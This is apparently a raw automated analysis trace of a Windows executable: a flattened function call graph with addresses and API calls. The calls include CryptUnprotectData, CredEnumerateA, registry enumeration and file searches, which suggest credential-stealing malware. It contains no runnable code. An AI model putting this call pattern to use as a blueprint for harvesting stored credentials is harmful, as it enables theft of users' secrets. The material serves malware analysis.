8547->8537 10364 404db6 8548->10364 8551 404db6 6 API calls 8552 40507e 8551->8552 8553 404db6 6 API calls 8552->8553 8562 40c768 8561->8562 8563 401b46 6 API calls 8562->8563 8564 40c77e 8563->8564 8565 40c7c1 8564->8565 8566 40c782 StrStrIA 8564->8566 8565->7566 8567 40c796 8566->8567 8568 40c7b9 8566->8568 8569 402200 9 API calls 8567->8569 8570 401752 LocalFree 8568->8570 8571 40c79e 8569->8571 8570->8565 8572 403dc3 41 API calls 8571->8572 8573 40c7b4 8572->8573 8574 401752 LocalFree 8573->8574 8574->8568 8576 40c2e4 8575->8576 10396 40c261 8576->10396 8579 40c261 46 API calls 8580 40c2fb 8579->8580 8581 40c261 46 API calls 8580->8581 8582 40c305 8581->8582 8582->7566 8584 40c7e2 8583->8584 8585 403fb9 46 API calls 8584->8585 8586 40c7fc 8585->8586 8586->7566 8588 40bee0 8587->8588 8589 40bd1f 46 API calls 8588->8589 8590 40bef0 8589->8590 8590->7566 8592 40c35d 8591->8592 10413 40c314 8592->10413 8595 40c314 46 API calls 8596 40c374 8595->8596 8597 40c314 46 API calls 8596->8597 8598 40c37e 8597->8598 8598->7566 8600 40156d 8599->8600 8601 407a60 GetWindowsDirectoryA 8600->8601 8602 407aa4 8601->8602 8603 407a78 8601->8603 8602->7566 8603->8602 8604 401bcd 5 API calls 8603->8604 8605 407a90 8604->8605 8606 403c89 16 API calls 8605->8606 8607 407a9f 8606->8607 8608 401752 LocalFree 8607->8608 8608->8602 8610 40db56 8609->8610 8611 401b46 6 API calls 8610->8611 8612 40db70 8611->8612 8613 40db8d 8612->8613 8614 403f6e 41 API calls 8612->8614 8615 403fb9 46 API calls 8613->8615 8617 40db88 8614->8617 8616 40dba4 8615->8616 8616->7566 8618 401752 LocalFree 8617->8618 8618->8613 8620 40d7d2 8619->8620 10422 40d5dc RegOpenKeyA 8620->10422 8623 40d5dc 14 API calls 8624 40d7fa 8623->8624 8624->7566 8626 406f52 8625->8626 10433 406d5e RegOpenKeyA 8626->10433 8629 406d5e 14 API calls 8630 406f7a 8629->8630 8630->7566 8638 403f88 8631->8638 8634 403f88 46 API calls 8635 403fe2 8634->8635 8636 403f88 46 API calls 8635->8636 8637 403ff5 8636->8637 8637->7654 8647 401c86 8638->8647 8641 403fb5 8641->8634 8646 401752 LocalFree 8646->8641 8667 401769 LocalAlloc 8647->8667 8649 401c97 8650 401ca5 SHGetFolderPathA 8649->8650 8651 401ca3 8649->8651 8650->8651 8652 401cf6 8650->8652 8653 401752 LocalFree 8651->8653 8652->8641 8656 401c21 8652->8656 8654 401cc3 8653->8654 8654->8652 8668 401b46 8654->8668 8657 401c2b lstrlen lstrlen 8656->8657 8687 401769 LocalAlloc 8657->8687 8660 401c5a lstrcpy lstrcat 8661 401c77 8660->8661 8662 401c7f 8660->8662 8663 401752 LocalFree 8661->8663 8664 403f6e 8662->8664 8663->8662 8688 403dc3 8664->8688 8667->8649 8669 401b52 8668->8669 8672 401a62 8669->8672 8673 401a70 RegOpenKeyExA 8672->8673 8675 401ab0 RegQueryValueExA 8673->8675 8676 401b1f 8673->8676 8678 401b17 RegCloseKey 8675->8678 8679 401acb 8675->8679 8677 401b41 8676->8677 8680 401a62 2 API calls 8676->8680 8677->8654 8678->8676 8679->8678 8686 401769 LocalAlloc 8679->8686 8680->8677 8682 401ae7 RegQueryValueExA 8683 401b01 8682->8683 8684 401b07 8682->8684 8685 401752 LocalFree 8683->8685 8684->8678 8685->8684 8686->8682 8687->8660 8689 403de2 8688->8689 8691 403ddd 8688->8691 8690 401752 LocalFree 8689->8690 8692 403f6a 8690->8692 8691->8689 8693 403e02 8691->8693 8694 403df3 8691->8694 8692->8646 8695 401bcd 5 API calls 8693->8695 8712 401bcd 8694->8712 8697 403e00 8695->8697 8713 401bd7 lstrlen lstrlen 8712->8713 8735 401769 LocalAlloc 8713->8735 8870 40cea9 8869->8870 8877 40cc74 8869->8877 8870->7659 8871 40cc7b RegEnumKeyExA 8872 40cca4 RegCloseKey 8871->8872 8871->8877 8872->8870 8874 401bcd LocalAlloc lstrlen lstrlen lstrcpy lstrcat 8874->8877 8875 401b46 6 API calls 8875->8877 8877->8871 8877->8874 8877->8875 8878 401752 LocalFree 8877->8878 8879 40cc54 13 API calls 8877->8879 8880 401548 lstrlen 8877->8880 8891 403ff9 8877->8891 8878->8877 8879->8877 8880->8877 8882 401b46 6 API calls 8881->8882 8883 40cec9 8882->8883 8884 40cf38 8883->8884 8885 40cf33 8883->8885 8887 40ceeb wsprintfA 8883->8887 8889 403c89 16 API calls 8883->8889 8890 401752 LocalFree 8883->8890 8884->7663 8886 401752 LocalFree 8885->8886 8886->8884 8888 401b46 6 API calls 8887->8888 8888->8883 8889->8883 8890->8883 8892 404022 8891->8892 8893 40407e 8891->8893 8892->8893 8894 40403f CryptUnprotectData 8892->8894 8893->8877 8894->8893 8896 40404f 8894->8896 8895 404076 LocalFree 8895->8893 8896->8893 8896->8895 8898 401bcd 5 API calls 8897->8898 8899 40220f lstrlen 8898->8899 8900 40222d StrStrIA 8899->8900 8901 40221e 8899->8901 8902 402240 StrRChrIA 8900->8902 8903 40223c 8900->8903 8901->8900 8904 40224e lstrlen 8902->8904 8903->8902 8906 402261 8904->8906 8906->7674 8908 401c86 7 API calls 8907->8908 8909 4072e0 8908->8909 8910 407332 8909->8910 8911 401c21 6 API calls 8909->8911 8910->7698 8912 4072ef 8911->8912 8913 403f6e 41 API calls 8912->8913 8914 407305 8913->8914 8915 403f6e 41 API calls 8914->8915 8916 407319 8915->8916 8917 403f6e 41 API calls 8916->8917 8918 40732d 8917->8918 8919 401752 LocalFree 8918->8919 8919->8910 8921 401c86 7 API calls 8920->8921 8922 407386 8921->8922 8923 407431 8922->8923 8924 4073a2 8922->8924 8925 401c21 6 API calls 8922->8925 8923->7706 8926 401bcd 5 API calls 8924->8926 8925->8924 8927 4073b2 8926->8927 8928 403c89 16 API calls 8927->8928 8929 4073c1 8928->8929 8930 401752 LocalFree 8929->8930 8931 4073c6 8930->8931 8932 401bcd 5 API calls 8931->8932 8933 4073d3 8932->8933 8934 403c89 16 API calls 8933->8934 8935 4073e2 8934->8935 8936 401752 LocalFree 8935->8936 8937 4073e7 8936->8937 8938 401bcd 5 API calls 8937->8938 8939 4073f4 8938->8939 8952 401b46 6 API calls 8951->8952 8953 40e45a 8952->8953 8954 40e479 8953->8954 8958 40e3f3 8953->8958 8954->7723 8957 401752 LocalFree 8957->8954 8965 40e3bd 8958->8965 8961 40e3bd 46 API calls 8962 40e424 8961->8962 8963 40e3bd 46 API calls 8962->8963 8964 40e43b 8963->8964 8964->8957 8966 401c86 7 API calls 8965->8966 8967 40e3c8 8966->8967 8968 40e3ef 8967->8968 8969 401c21 6 API calls 8967->8969 8968->8961 8970 40e3d5 8969->8970 8971 403dc3 41 API calls 8970->8971 8972 40e3ea 8971->8972 8973 401752 LocalFree 8972->8973 8973->8968 8975 40652e 8974->8975 8982 4062cf 8974->8982 8975->7732 8976 4062d6 RegEnumKeyExA 8977 4062ff RegCloseKey 8976->8977 8976->8982 8977->8975 8979 401bcd 5 API calls 8979->8982 8980 401c21 6 API calls 8980->8982 8981 401b46 6 API calls 8981->8982 8982->8976 8982->8979 8982->8980 8982->8981 8983 403ff9 2 API calls 8982->8983 8984 401752 LocalFree 8982->8984 8985 401548 lstrlen 8982->8985 8983->8982 8984->8982 8985->8982 8987 4046ae 8986->8987 8994 40455b 8986->8994 8987->7738 8988 404562 RegEnumKeyExA 8989 40458b RegCloseKey 8988->8989 8988->8994 8989->8987 8991 401bcd LocalAlloc lstrlen lstrlen lstrcpy lstrcat 8991->8994 8992 401752 LocalFree 8992->8994 8993 401b46 6 API calls 8993->8994 8994->8988 8994->8991 8994->8992 8994->8993 8995 401548 lstrlen 8994->8995 8996 404538 11 API calls 8994->8996 8995->8994 8996->8994 8998 404534 8997->8998 8999 40444d 8997->8999 8998->7744 9000 404454 RegEnumValueA 8999->9000 9003 40449e StrStrIA 8999->9003 9004 401b46 6 API calls 8999->9004 9005 401752 LocalFree 8999->9005 9000->8999 9001 404482 RegCloseKey 9000->9001 9001->8998 9003->8999 9004->8999 9005->8999 9007 4089eb 9006->9007 9014 408920 9006->9014 9007->7754 9008 408927 RegEnumKeyExA 9009 408950 RegCloseKey 9008->9009 9008->9014 9009->9007 9010 401bcd LocalAlloc lstrlen lstrlen lstrcpy lstrcat 9010->9014 9012 401b46 6 API calls 9012->9014 9014->9008 9014->9010 9014->9012 9015 408900 11 API calls 9014->9015 9016 401752 LocalFree 9014->9016 9032 403c60 9014->9032 9015->9014 9016->9014 9018 408b2d 9017->9018 9019 408a0f 9017->9019 9018->7758 9020 408a16 RegEnumKeyExA 9019->9020 9023 401bcd LocalAlloc lstrlen lstrlen lstrcpy lstrcat 9019->9023 9024 401752 LocalFree 9019->9024 9025 401b46 6 API calls 9019->9025 9026 402200 9 API calls 9019->9026 9028 4089ef 50 API calls 9019->9028 9031 408a93 9019->9031 9020->9019 9021 408a3f RegCloseKey 9020->9021 9021->9018 9023->9019 9024->9019 9025->9019 9026->9019 9028->9019 9029 401752 LocalFree 9029->9019 9030 403f6e 41 API calls 9030->9031 9031->9029 9031->9030 9039 401d53 9031->9039 9033 403c85 9032->9033 9034 403c69 9032->9034 9033->9014 9034->9033 9036 401548 9034->9036 9037 401551 lstrlen 9036->9037 9038 40155b 9036->9038 9037->9038 9038->9033 9040 401d62 9039->9040 9041 401d5d 9039->9041 9040->9031 9041->9040 9042 401d6b GetFileAttributesA 9041->9042 9043 401d78 9042->9043 9043->9031 9045 40e157 9044->9045 9046 40e15b 9044->9046 9045->7763 9055 401769 LocalAlloc 9046->9055 9048 40e165 lstrlen 9050 40e1a4 9048->9050 9051 40e18f 9048->9051 9052 401752 LocalFree 9050->9052 9053 403f6e 41 API calls 9051->9053 9054 40e1ac 9052->9054 9053->9050 9054->7763 9055->9048 9069 40bce9 9056->9069 9059 40bce9 46 API calls 9060 40bd50 9059->9060 9061 40bce9 46 API calls 9060->9061 9062 40bd67 9061->9062 9063 40bce9 46 API calls 9062->9063 9064 40bd7e 9063->9064 9065 40bce9 46 API calls 9064->9065 9066 40bd95 9065->9066 9067 40bce9 46 API calls 9066->9067 9068 40bdac 9067->9068 9068->7767 9070 401c86 7 API calls 9069->9070 9071 40bcf4 9070->9071 9072 40bd1b 9071->9072 9073 401c21 6 API calls 9071->9073 9072->9059 9074 40bd01 9073->9074 9075 403dc3 41 API calls 9074->9075 9076 40bd16 9075->9076 9077 401752 LocalFree 9076->9077 9077->9072 9079 409833 9078->9079 9080 40988a 9078->9080 9081 401b46 6 API calls 9079->9081 9109 401769 LocalAlloc 9080->9109 9083 409845 9081->9083 9083->9080 9086 402200 9 API calls 9083->9086 9084 409894 RegOpenKeyA 9085 40991a 9084->9085 9099 4098aa 9084->9099 9087 401752 LocalFree 9085->9087 9089 409850 9086->9089 9090 409922 9087->9090 9088 4098b1 RegEnumKeyExA 9091 4098d6 RegCloseKey 9088->9091 9088->9099 9093 409885 9089->9093 9096 401c86 7 API calls 9089->9096 9090->7786 9091->9085 9092 401bcd 5 API calls 9092->9099 9095 401752 LocalFree 9093->9095 9095->9080 9098 40985e 9096->9098 9097 401c21 6 API calls 9097->9099 9100 40987d 9098->9100 9101 401c21 6 API calls 9098->9101 9099->9088 9099->9092 9099->9097 9102 40981e 79 API calls 9099->9102 9106 401752 LocalFree 9099->9106 9103 401752 LocalFree 9100->9103 9104 40986b 9101->9104 9102->9099 9103->9093 9110 4096a3 9104->9110 9106->9099 9107 409878 9108 401752 LocalFree 9107->9108 9108->9100 9109->9084 9111 401d53 GetFileAttributesA 9110->9111 9112 4096b2 9111->9112 9113 4096b6 9112->9113 9114 401d53 GetFileAttributesA 9112->9114 9113->9107 9116 4096c3 9114->9116 9115 4096c7 9115->9107 9116->9115 9117 4096e7 9116->9117 9118 4096d8 9116->9118 9288 40de36 9287->9288 9289 40df5e 9287->9289 9290 401b46 6 API calls 9288->9290 9289->7795 9291 40de48 9290->9291 9292 401b46 6 API calls 9291->9292 9293 40de5d 9292->9293 9294 401b46 6 API calls 9293->9294 9295 40de74 9294->9295 9296 401b46 6 API calls 9295->9296 9297 40de89 9296->9297 9298 401b46 6 API calls 9297->9298 9304 40de9e 9298->9304 9299 40df2e 9300 401752 LocalFree 9299->9300 9301 40df36 9300->9301 9302 401752 LocalFree 9301->9302 9303 40df3e 9302->9303 9305 401752 LocalFree 9303->9305 9304->9299 9306 403ff9 2 API calls 9304->9306 9307 40df46 9305->9307 9311 40ded1 9306->9311 9311->9299 9313 401548 lstrlen 9311->9313 9314 40deff 9313->9314 9315 401548 lstrlen 9314->9315 9316 40df0a 9315->9316 9317 401548 lstrlen 9316->9317 9321 40df82 9320->9321 9322 40e027 9320->9322 9323 40df89 RegEnumValueA 9321->9323 9326 401b46 6 API calls 9321->9326 9327 40dfe4 StrStrIA 9321->9327 9329 401752 LocalFree 9321->9329 9330 40dce0 9321->9330 9322->7799 9323->9321 9324 40dfb7 RegCloseKey 9323->9324 9324->9322 9326->9321 9327->9321 9329->9321 9331 401d0b 2 API calls 9330->9331 9332 40dcef 9331->9332 9333 40dcf3 9332->9333 9334 401dd2 7 API calls 9332->9334 9333->9321 9335 40dd04 9334->9335 9345 40de12 9335->9345 9350 401769 LocalAlloc 9335->9350 9337 40dd2d StrStrA 9338 40dd41 lstrlen StrStrA 9337->9338 9340 40dd3c 9337->9340 9339 40dd66 lstrlen 9338->9339 9338->9340 9348 40dd14 9339->9348 9342 401752 LocalFree 9340->9342 9341 4027f2 3 API calls 9341->9348 9343 40de09 9342->9343 9344 401e66 3 API calls 9343->9344 9344->9345 9345->9321 9346 403ff9 2 API calls 9346->9348 9347 401752 LocalFree 9347->9348 9348->9337 9348->9340 9348->9341 9348->9346 9348->9347 9349 401548 lstrlen 9348->9349 9349->9348 9350->9348 9352 401578 9351->9352 9352->7803 9370 401769 LocalAlloc 9353->9370 9355 40e5ee RegOpenKeyA 9356 40e716 9355->9356 9367 40e60b 9355->9367 9358 401752 LocalFree 9356->9358 9357 40e612 RegEnumKeyExA 9359 40e63b RegCloseKey 9357->9359 9357->9367 9360 40e721 9358->9360 9359->9356 9360->7813 9362 401bcd LocalAlloc lstrlen lstrlen lstrcpy lstrcat 9362->9367 9363 401b46 6 API calls 9363->9367 9364 40e5db 45 API calls 9364->9367 9365 401bcd 5 API calls 9366 40e69c GetPrivateProfileStringA 9365->9366 9366->9367 9367->9357 9367->9362 9367->9363 9367->9364 9367->9365 9368 401752 LocalFree 9367->9368 9369 403f6e 41 API calls 9367->9369 9368->9367 9369->9367 9370->9355 9372 401c86 7 API calls 9371->9372 9373 40880e 9372->9373 9374 408821 9373->9374 9401 4086c7 9373->9401 9374->7821 9377 401752 LocalFree 9377->9374 9379 408562 9378->9379 9382 40855d 9378->9382 9380 401752 LocalFree 9379->9380 9381 4086c3 9380->9381 9381->7833 9382->9379 9383 408582 9382->9383 9384 408573 9382->9384 9386 401bcd 5 API calls 9383->9386 9385 401bcd 5 API calls 9384->9385 9387 408580 9385->9387 9386->9387 9388 4085a6 FindFirstFileA 9387->9388 9388->9379 9396 4085c5 9388->9396 9402 4086e1 9401->9402 9403 4086e6 9401->9403 9402->9403 9404 401bcd 5 API calls 9402->9404 9405 401752 LocalFree 9403->9405 9407 4086f8 9404->9407 9406 4087ff 9405->9406 9406->9377 9408 40870f FindFirstFileA 9407->9408 9408->9403 9413 40872e 9408->9413 9409 408740 lstrcmpiA 9412 40875a lstrcmpiA 9409->9412 9409->9413 9410 4087cf FindNextFileA 9411 4087e9 FindClose 9410->9411 9410->9413 9411->9403 9412->9413 9413->9409 9413->9410 9414 401bcd 5 API calls 9413->9414 9415 401c21 6 API calls 9413->9415 9414->9413 9416 40879c StrStrIA 9415->9416 9417 4087b7 9416->9417 9418 4087ca 9416->9418 9419 408543 38 API calls 9417->9419 9420 401752 LocalFree 9418->9420 9419->9418 9420->9410 9512 40f2f9 9511->9512 9513 40f2df 9511->9513 9515 40eeef RegOpenKeyA 9512->9515 9513->9512 9535 40a040 9513->9535 9516 40ef8a 9515->9516 9521 40ef0b 9515->9521 9516->7866 9517 40ef12 RegEnumKeyExA 9518 40ef3b RegCloseKey 9517->9518 9517->9521 9518->9516 9520 401bcd 5 API calls 9520->9521 9521->9517 9521->9520 9522 401c21 6 API calls 9521->9522 9524 401752 LocalFree 9521->9524 9548 40ed5a 9521->9548 9522->9521 9524->9521 9526 40f034 9525->9526 9527 40efae 9525->9527 9526->7870 9528 40efb5 RegEnumKeyExA 9527->9528 9531 401bcd 5 API calls 9527->9531 9532 401c21 6 API calls 9527->9532 9533 40eeef 23 API calls 9527->9533 9534 401752 LocalFree 9527->9534 9528->9527 9529 40efde RegCloseKey 9528->9529 9529->9526 9531->9527 9532->9527 9533->9527 9534->9527 9537 40a060 9535->9537 9536 40a0b5 9536->9512 9537->9536 9539 409faa 9537->9539 9541 409fcd 9539->9541 9540 40a02a 9540->9537 9541->9540 9543 409f24 9541->9543 9544 409f31 9543->9544 9546 409f36 9543->9546 9544->9541 9545 409f9a 9545->9541 9546->9545 9547 409f89 CoTaskMemFree 9546->9547 9547->9546 9550 40ed6a 9548->9550 9549 401b46 6 API calls 9549->9550 9550->9549 9552 401752 LocalFree 9550->9552 9556 40eda6 9550->9556 9567 40ed10 9550->9567 9552->9550 9553 401b46 6 API calls 9553->9556 9554 401548 lstrlen 9554->9556 9555 401b46 6 API calls 9559 40edfd 9555->9559 9556->9553 9556->9554 9557 401752 LocalFree 9556->9557 9556->9559 9557->9556 9558 401752 LocalFree 9558->9559 9559->9555 9559->9558 9561 403ff9 2 API calls 9559->9561 9563 40ed10 6 API calls 9559->9563 9565 40ee7e 9559->9565 9560 401b46 6 API calls 9560->9565 9561->9559 9562 40eed5 9562->9521 9563->9559 9564 401548 lstrlen 9564->9565 9565->9560 9565->9562 9565->9564 9566 401752 LocalFree 9565->9566 9566->9565 9576 402890 9567->9576 9569 40ed21 9570 401548 lstrlen 9569->9570 9575 40ed51 9569->9575 9571 40ed3e 9570->9571 9572 401548 lstrlen 9571->9572 9573 40ed49 9572->9573 9574 401752 LocalFree 9573->9574 9574->9575 9575->9550 9577 402899 9576->9577 9578 40289f 9576->9578 9577->9578 9579 4028a5 IsTextUnicode 9577->9579 9578->9569 9580 4028c6 9579->9580 9581 4028b6 9579->9581 9595 401769 LocalAlloc 9580->9595 9585 402813 9581->9585 9584 4028c4 9584->9569 9586 402820 9585->9586 9587 402827 WideCharToMultiByte 9585->9587 9586->9584 9588 402844 9587->9588 9594 402876 9587->9594 9596 401769 LocalAlloc 9588->9596 9590 40284f 9591 402853 WideCharToMultiByte 9590->9591 9590->9594 9592 402870 9591->9592 9591->9594 9594->9584 9595->9584 9596->9590 9598 401b46 6 API calls 9597->9598 9599 405ac2 9598->9599 9600 405adb 9599->9600 9601 403f6e 41 API calls 9599->9601 9602 401b46 6 API calls 9600->9602 9603 405ad6 9601->9603 9604 405af1 9602->9604 9605 401752 LocalFree 9603->9605 9606 405b0a 9604->9606 9607 403f6e 41 API calls 9604->9607 9605->9600 9608 403fb9 46 API calls 9606->9608 9609 405b05 9607->9609 9610 405b1d 9608->9610 9611 401752 LocalFree 9609->9611 9610->7890 9611->9606 9612->7899 9613->7911 9615 4040e5 9614->9615 9616 4040a7 GetProcAddress 9614->9616 9615->7923 9616->9615 9617 4040b6 GetProcAddress 9616->9617 9617->9615 9618 4040c7 GetCurrentProcess 9617->9618 9619 4040d5 9618->9619 9619->7923 9619->9615 9620->7925 9622 40152a 9621->9622 9622->7927 9624 404110 9623->9624 9625 4040fe 9623->9625 9624->7930 9625->9624 9626 404117 AllocateAndInitializeSid 9625->9626 9627 404158 9626->9627 9628 40415a CheckTokenMembership 9626->9628 9627->7930 9629 404174 9628->9629 9630 40417b FreeSid 9628->9630 9629->9630 9630->7930 9632 4025cc 18 API calls 9631->9632 9633 40419d 9632->9633 9634 4041a8 CoCreateGuid 9633->9634 9635 404213 9633->9635 9634->9635 9636 4041b5 wsprintfA lstrlen 9634->9636 9638 401752 LocalFree 9635->9638 9688 40ea8c 9687->9688 9697 40e7a5 9687->9697 9688->7964 9689 40e7ac RegEnumKeyExA 9690 40e7d5 RegCloseKey 9689->9690 9689->9697 9690->9688 9692 401bcd 5 API calls 9692->9697 9693 401c21 6 API calls 9693->9697 9694 401b46 6 API calls 9694->9697 9695 40e785 15 API calls 9695->9697 9696 401548 lstrlen 9696->9697 9697->9689 9697->9692 9697->9693 9697->9694 9697->9695 9697->9696 9698 401752 LocalFree 9697->9698 9698->9697 9702 40a526 9699->9702 9704 40a47c 9699->9704 9700 40a2f4 17 API calls 9701 40a54b 9700->9701 9708 40a54f 9701->9708 9702->9700 9703 40a4de StrStrIW 9703->9704 9704->9702 9704->9703 9717 40a2f4 lstrlenW 9704->9717 9706 40a50e CoTaskMemFree 9706->9704 9707 40a51c CoTaskMemFree 9706->9707 9707->9704 9709 40a55f 9708->9709 9710 40a685 9709->9710 9711 40a5a4 CredEnumerateA 9709->9711 9710->7972 9711->9710 9712 40a5cf 9711->9712 9712->9710 9713 40a67c CredFree 9712->9713 9714 40a5eb lstrlenW CryptUnprotectData 9712->9714 9715 40a65e LocalFree 9712->9715 9743 40a104 9712->9743 9713->9710 9714->9712 9715->9712 9718 40a307 9717->9718 9723 40a30c 9717->9723 9718->9706 9719 40a36a wsprintfA 9722 401c21 6 API calls 9719->9722 9720 40a33d wsprintfA 9721 401c21 6 API calls 9720->9721 9721->9723 9724 40a391 9722->9724 9723->9719 9723->9720 9725 401b46 6 API calls 9724->9725 9726 40a3ab 9725->9726 9727 40a44a 9726->9727 9729 40a3c0 lstrlenW 9726->9729 9730 40a442 9726->9730 9728 401752 LocalFree 9727->9728 9732 40a452 9728->9732 9729->9730 9733 40a3f2 CryptUnprotectData 9729->9733 9731 401752 LocalFree 9730->9731 9731->9727 9732->9706 9733->9730 9734 40a410 9733->9734 9734->9730 9737 40a0cb 9734->9737 9736 40a43a LocalFree 9736->9730 9741 4014e6 9737->9741 9739 40a0d9 lstrlenW 9740 40a0f2 9739->9740 9740->9736 9742 4014f7 9741->9742 9742->9739 9744 4014e6 9743->9744 9745 40a112 lstrlen 9744->9745 9746 40a127 9745->9746 9746->9715 9748 401b46 6 API calls 9747->9748 9749 4050fb 9748->9749 9750 40515b 9749->9750 9751 401bcd 5 API calls 9749->9751 9750->7978 9752 40510f 9751->9752 9775 4050c2 9752->9775 9755 401bcd 5 API calls 9756 40512a 9755->9756 9757 4050c2 16 API calls 9756->9757 9758 405138 9757->9758 9759 401bcd 5 API calls 9758->9759 9760 405145 9759->9760 9761 4050c2 16 API calls 9760->9761 9762 405153 9761->9762 9763 401752 LocalFree 9762->9763 9763->9750 9776 4050e1 9775->9776 9777 4050cb 9775->9777 9776->9755 9778 403c89 16 API calls 9777->9778 9779 4050d9 9778->9779 9780 401752 LocalFree 9779->9780 9780->9776 9795 407d02 9794->9795 9796 407b0e 9794->9796 9795->8022 9797 407b15 RegEnumKeyExA 9796->9797 9800 401bcd LocalAlloc lstrlen lstrlen lstrcpy lstrcat 9796->9800 9801 401b46 6 API calls 9796->9801 9802 401752 LocalFree 9796->9802 9803 401548 lstrlen 9796->9803 9804 407aee 11 API calls 9796->9804 9797->9796 9798 407b3e RegCloseKey 9797->9798 9798->9795 9800->9796 9801->9796 9802->9796 9803->9796 9804->9796 9806 401c86 7 API calls 9805->9806 9807 40d552 9806->9807 9808 40d57f 9807->9808 9809 401c21 6 API calls 9807->9809 9808->8072 9810 40d561 9809->9810 9811 403dc3 41 API calls 9810->9811 9812 40d57a 9811->9812 9813 401752 LocalFree 9812->9813 9813->9808 9815 4079fe 9814->9815 9821 4077bc 9814->9821 9815->8082 9816 4077c3 RegEnumKeyExA 9817 4077ec RegCloseKey 9816->9817 9816->9821 9817->9815 9819 401bcd LocalAlloc lstrlen lstrlen lstrcpy lstrcat 9819->9821 9820 401b46 6 API calls 9820->9821 9821->9816 9821->9819 9821->9820 9822 401752 LocalFree 9821->9822 9823 401548 lstrlen 9821->9823 9824 40779c 11 API calls 9821->9824 9822->9821 9823->9821 9824->9821 9826 401c86 7 API calls 9825->9826 9827 408bc0 9826->9827 9828 408bfd 9827->9828 9829 401c21 6 API calls 9827->9829 9828->8088 9830 408bcf 9829->9830 9831 403f6e 41 API calls 9830->9831 9832 408be4 9831->9832 9833 403f6e 41 API calls 9832->9833 9834 408bf8 9833->9834 9835 401752 LocalFree 9834->9835 9835->9828 9837 4068fc 9836->9837 9845 40675b 9836->9845 9837->8107 9838 406762 RegEnumKeyExA 9839 40678b RegCloseKey 9838->9839 9838->9845 9839->9837 9841 401bcd LocalAlloc lstrlen lstrlen lstrcpy lstrcat 9841->9845 9842 401b46 6 API calls 9842->9845 9843 401752 LocalFree 9843->9845 9844 401548 lstrlen 9844->9845 9845->9838 9845->9841 9845->9842 9845->9843 9845->9844 9847 40c948 9846->9847 9848 40c8cc 9846->9848 9847->8120 9848->9847 9849 40c8de CredEnumerateA 9848->9849 9849->9847 9850 40c905 9849->9850 9850->9847 9851 40c93f CredFree 9850->9851 9853 40c80b 9850->9853 9851->9847 9854 40c81e 9853->9854 9855 401548 lstrlen 9854->9855 9856 40c829 9855->9856 9857 401548 lstrlen 9856->9857 9858 40c834 9857->9858 9859 40c842 StrStrIA 9858->9859 9860 40c853 lstrlen StrStrIA 9859->9860 9865 40c89f 9859->9865 9861 40c871 9860->9861 9866 40359b inet_addr 9861->9866 9863 40c87f 9864 401548 lstrlen 9863->9864 9863->9865 9864->9865 9865->9850 9867 4035b7 9866->9867 9868 4035ab gethostbyname 9866->9868 9867->9863 9868->9867 9870 40da79 9869->9870 9876 40d864 9869->9876 9870->8134 9871 40d86b RegEnumKeyExA 9872 40d894 RegCloseKey 9871->9872 9871->9876 9872->9870 9874 401bcd LocalAlloc lstrlen lstrlen lstrcpy lstrcat 9874->9876 9875 401b46 6 API calls 9875->9876 9876->9871 9876->9874 9876->9875 9877 40d844 11 API calls 9876->9877 9878 401548 lstrlen 9876->9878 9879 401752 LocalFree 9876->9879 9877->9876 9878->9876 9879->9876 9881 406277 9880->9881 9889 40603d 9880->9889 9881->8143 9882 406044 RegEnumKeyExA 9883 40606d RegCloseKey 9882->9883 9882->9889 9883->9881 9885 401bcd 5 API calls 9885->9889 9886 401c21 6 API calls 9886->9889 9887 401b46 6 API calls 9887->9889 9888 401752 LocalFree 9888->9889 9889->9882 9889->9885 9889->9886 9889->9887 9889->9888 9890 401548 lstrlen 9889->9890 9890->9889 9892 40d374 9891->9892 9901 40d1c5 9891->9901 9892->8147 9893 40d1cc RegEnumKeyExA 9894 40d1f5 RegCloseKey 9893->9894 9893->9901 9894->9892 9896 401bcd LocalAlloc lstrlen lstrlen lstrcpy lstrcat 9896->9901 9897 401b46 6 API calls 9897->9901 9898 40d1a2 11 API calls 9898->9901 9899 401752 LocalFree 9899->9901 9900 401548 lstrlen 9900->9901 9901->9893 9901->9896 9901->9897 9901->9898 9901->9899 9901->9900 9903 401b46 6 API calls 9902->9903 9904 40eb68 9903->9904 9905 40eb82 9904->9905 9930 40ead9 9904->9930 9907 401b46 6 API calls 9905->9907 9909 40eb96 9907->9909 9911 40ebb0 9909->9911 9913 40ead9 41 API calls 9909->9913 9912 401b46 6 API calls 9911->9912 9915 40ebc4 9912->9915 9914 40eba8 9913->9914 9916 401752 LocalFree 9914->9916 9917 40ebde 9915->9917 9918 40ead9 41 API calls 9915->9918 9916->9911 9931 403f6e 41 API calls 9930->9931 9932 40eaf4 9931->9932 9933 403f6e 41 API calls 9932->9933 9934 40eb09 9933->9934 9935 401d8e 4 API calls 9934->9935 9936 40eb11 9935->9936 9937 40eb4a 9936->9937 9938 403f6e 41 API calls 9936->9938 9944 40abf0 9943->9944 9953 40aadc 9943->9953 9944->8191 9945 40aae3 RegEnumKeyExA 9946 40ab0c RegCloseKey 9945->9946 9945->9953 9946->9944 9948 401bcd LocalAlloc lstrlen lstrlen lstrcpy lstrcat 9948->9953 9949 401752 LocalFree 9949->9953 9950 401b46 6 API calls 9950->9953 9951 40aab9 21 API calls 9951->9953 9953->9945 9953->9948 9953->9949 9953->9950 9953->9951 9954 40a820 9953->9954 10017 401769 LocalAlloc 9954->10017 9956 40a830 10018 401769 LocalAlloc 9956->10018 9958 40a83d 10019 401769 LocalAlloc 9958->10019 9960 40a84a 10020 401769 LocalAlloc 9960->10020 9962 40a857 10021 401769 LocalAlloc 9962->10021 9964 40a864 10022 401769 LocalAlloc 9964->10022 9966 40a871 10023 401769 LocalAlloc 9966->10023 9968 40a87e 7 API calls 9969 401b46 6 API calls 9968->9969 10017->9956 10018->9958 10019->9960 10020->9962 10021->9964 10022->9966 10023->9968 10031->8203 10033 40486a 10032->10033 10035 404748 10032->10035 10033->8209 10034 404761 10037 401b46 6 API calls 10034->10037 10035->10034 10036 401c21 6 API calls 10035->10036 10036->10034 10038 40477b 10037->10038 10039 40479d 10038->10039 10041 401bcd 5 API calls 10038->10041 10040 401b46 6 API calls 10039->10040 10044 4047b3 10040->10044 10042 404789 10041->10042 10045 404724 16 API calls 10042->10045 10043 4047d5 10047 401b46 6 API calls 10043->10047 10044->10043 10046 401bcd 5 API calls 10044->10046 10048 404793 10045->10048 10049 4047c1 10046->10049 10050 4047ec 10047->10050 10051 401752 LocalFree 10048->10051 10052 404724 16 API calls 10049->10052 10053 40480e 10050->10053 10057 401bcd 5 API calls 10050->10057 10054 404798 10051->10054 10055 4047cb 10052->10055 10056 401b46 6 API calls 10053->10056 10058 401752 LocalFree 10054->10058 10059 401752 LocalFree 10055->10059 10060 404824 10056->10060 10061 